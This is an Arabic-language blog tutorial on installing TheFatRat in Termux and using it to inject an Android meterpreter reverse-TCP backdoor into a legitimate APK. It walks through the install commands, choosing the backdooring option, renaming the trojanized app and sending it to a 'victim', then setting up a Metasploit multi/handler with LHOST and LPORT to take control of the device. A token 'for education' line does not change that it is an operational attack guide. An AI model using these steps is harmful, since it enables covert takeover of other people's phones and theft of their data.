تثبيت اداه TheFatRat للتريمكس لاختبار الاختراق 2020
مرحبا بكم في مدونه واتس اب الكاسر
في شرح اليوم جبت لكم اداه جميله لعشاق التريمكس وعشاق الكالي لينكس
وضائف الاداه
● اختبار الاختراق
● حقن تطبيقات الاندرويد
فكيفيه اختراق اجهزه الاندرويد عبر حقن التطبيقات من خلال اداة TheFatRat
الشرح للتعليم واخذ الحذر
بهذا الشرح سنقوم بأستخدام الاداه في حقن تطبيقات الاندرويد
في البدايه نقوم بتحميل الاداه من هنا
تثبيت الاداه:
cd TheFatRat
chmod +x setup.sh && ./setup.sh
قد ياخذ فتره من الوقت لـ التثبيت
بعد التثبيت نقوم بـ اعطاء ملفي fatrat وpowerfull.sh صلاحيه من خلال تنفيذ الامرين التاليه:
chmod +x fatrat
chmod +x powerfull.sh
لـ تشغيل الاداه ننفذ الامر التالي:
./fatrat
بعد تشغيل الاداه ستظهر لك قائمة بـ الخيارات !
بعد ذلك نقوم بـأختيار الخيار الخامس
[05] Backdooring Original apk [Instagram, Line,etc]
ثم نقوم بـ أدخال الاي بي الخاص بنا والبورت
ثم نقوم بـ ادخال مسار التطبيق المراد حقنه
ثم نقوم بـ اختيار
(android/meterpreter/reverse_tcp) كطريقه اتصال بيني وبين الهدف وهو اتصال عكسي
ثم ننتظر بعض الوقت حتى تاتينا رساله بأن تطبيقنا جاهز
Your RAT apk was successfully builded and signed , it is located here :
/home/xabdullah/TheFatRat/backdoored/app_backdoor.apk
الان نقوم بالدخول على مجلد backdoored
cd backdoored
الان تطبيقنا الي قمنا بحقنه موجود بأسم app_backdoor.apk نقوم بتغيير اسمه الى أي أسم ثم نقوم بـ ارساله الى الضحيه ( انت وطريقتك )
بعدها نقوم بالدخول على Metasploit لـلسيطره على جهاز الضحيه
ثم نقوم بـ استخدام multi_handler لتساعدنا على الارسال والاستقبال والتحكم عبر الامر التالي:
use exploit/multi/handler
ثم سنقوم بتحديد البايلود الي سبق قمن بحقنه بالتطبيق من خلال الامر التالي:
set payload android/meterpreter/reverse_tcp
ثم سنقوم بوضع الاي بي الخاص بنا الي سبق ووضعناه كوسيله اتصال, من خلال الامر التالي :
set LHOST 192.168.1.134
وايضا نطبق نفس الامر لـ البورت من خلال الامر التالي:
set LPORT 4444